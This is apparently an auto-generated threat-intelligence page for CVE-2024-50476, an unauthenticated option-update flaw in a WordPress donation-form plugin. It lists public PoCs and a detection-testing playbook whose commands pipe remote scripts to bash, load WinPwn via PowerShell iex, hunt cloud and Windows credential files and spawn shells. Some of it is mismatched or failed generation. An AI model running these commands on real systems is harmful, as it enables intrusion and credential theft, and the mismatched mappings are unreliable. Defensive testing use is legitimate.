CVE-2024-50476
Overview
The vulnerability is a Missing Authorization flaw classified under CWE-862, occurring in the GRÜN spendino Spendenformular plugin. The root cause is the absence of proper access control checks on certain functions that manage configuration options. This allows unauthorized users to interact with privileged functionalities of the spendino donation form component without authentication.
Vulnerability Description
Missing Authorization vulnerability in GRÜN Software Group GmbH GRÜN spendino Spendenformular spendino allows Privilege Escalation.This issue affects GRÜN spendino Spendenformular: from n/a through <= 1.0.1.
Impact
An unauthenticated attacker can escalate privileges by modifying critical plugin settings, potentially gaining administrative access to the WordPress site. This enables full control over the affected installation, including the ability to alter donation form behavior and access sensitive data. No user interaction or prior authentication is required, making exploitation straightforward and increasing the risk of complete site compromise and data breach.
Solution
Users of GRÜN spendino Spendenformular should upgrade to version 1.0.2 or later, where authorization checks have been implemented to restrict access to option update functionalities. Detailed patch instructions and updates are available at Patchstack's advisory page: https://patchstack.com/database/Wordpress/Plugin/spendino/vulnerability/wordpress-gruen-spendino-spendenformular-plugin-1-0-1-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve. Applying this update mitigates the missing authorization vulnerability by enforcing proper access control.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The identified vulnerability within the GRÜN Software Group GmbH's GRÜN spendino Spendenformular is characterized by a missing authorization mechanism, which can lead to privilege escalation. This flaw allows unauthorized users to gain elevated access to functionalities and data that should be restricted to higher-privileged accounts. The absence of proper authorization checks means that an attacker could exploit this weakness to perform actions such as accessing sensitive information, modifying user roles, or executing administrative functions without the necessary permissions. The vulnerability is present in versions up to and including 1.0.1, making it critical for organizations using this software to assess their exposure.
Attack vectors for this vulnerability are varied but primarily involve manipulating requests to the application. An attacker could leverage tools such as automated scripts or web proxies to intercept and modify requests sent to the server. By bypassing the intended authorization checks, the attacker could impersonate a privileged user or directly invoke administrative functions. Scenarios may include an attacker gaining access to user data, altering donation records, or even disrupting the application's functionality. Given that the software is used for managing donations, the implications of such exploitation could extend beyond mere data theft, potentially affecting the trust and reputation of organizations relying on this platform.
The real-world impact of this vulnerability is significant, particularly for non-profit organizations and charities that utilize the GRÜN spendino Spendenformular for managing donations. A successful exploitation could lead to unauthorized access to donor information, financial records, and other sensitive data. This not only poses a risk of data breaches but also raises concerns about compliance with data protection regulations, such as GDPR. The potential for financial loss, reputational damage, and legal ramifications makes the business risk associated with this vulnerability exceptionally high. Organizations could face a loss of donor trust, which is critical for their operational sustainability.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including penetration testing and code reviews, can help identify missing authorization checks before they can be exploited. Additionally, employing web application firewalls (WAFs) can provide an additional layer of security by monitoring and filtering incoming traffic for suspicious activities. It is also essential for organizations to stay updated with the latest software patches and updates from the vendor, as these often include fixes for known vulnerabilities. Training staff on security best practices and fostering a culture of security awareness can further enhance an organization's resilience against such threats.
In conclusion, the missing authorization vulnerability in the GRÜN spendino Spendenformular poses a serious risk to organizations that rely on this software for managing donations. The potential for privilege escalation can lead to severe consequences, including data breaches and loss of trust. By understanding the technical details, attack vectors, and real-world implications, organizations can take proactive measures to detect and mitigate this vulnerability effectively. Implementing robust security practices and maintaining vigilance in monitoring and updating systems will be crucial in safeguarding against such threats.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-50476. A public proof-of-concept exploit has emerged on GitHub, marking the first known availability of an exploitation tool targeting the missing authorization vulnerability in GRÜN spendino Spendenformular versions up to 1.0.1. This new exploit presence has driven the CVSS score to be formally recognized as critical at 9.8, reflecting the high potential impact and ease of exploitation. Concurrently, the Exploit Prediction Scoring System (EPSS) score has risen sharply to 0.247, placing this vulnerability within the top percentile of likely exploitation events according to our telemetry. This shift signals an elevated risk posture, as threat actors now have accessible means to execute privilege escalation attacks without authentication, increasing the likelihood of successful intrusions. Defenders should note that the availability of public exploit code typically accelerates adversary adoption and broadens the attack surface, which can lead to a marked escalation in exploitation attempts. Consequently, the threat level associated with CVE-2024-50476 has intensified, warranting heightened vigilance and prioritization in detection efforts.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-50476
GRÜN spendino Spendenformular <= 1.0.1 - Unauthenticated Arbitrary Options Update
|
RandomRobbieBF | 0 | 1 | 2024-11-04 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
42%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50476 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/spendino/vulnerability/wordpress-gruen-spendino-spendenformular-plugin-1-0-1-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve |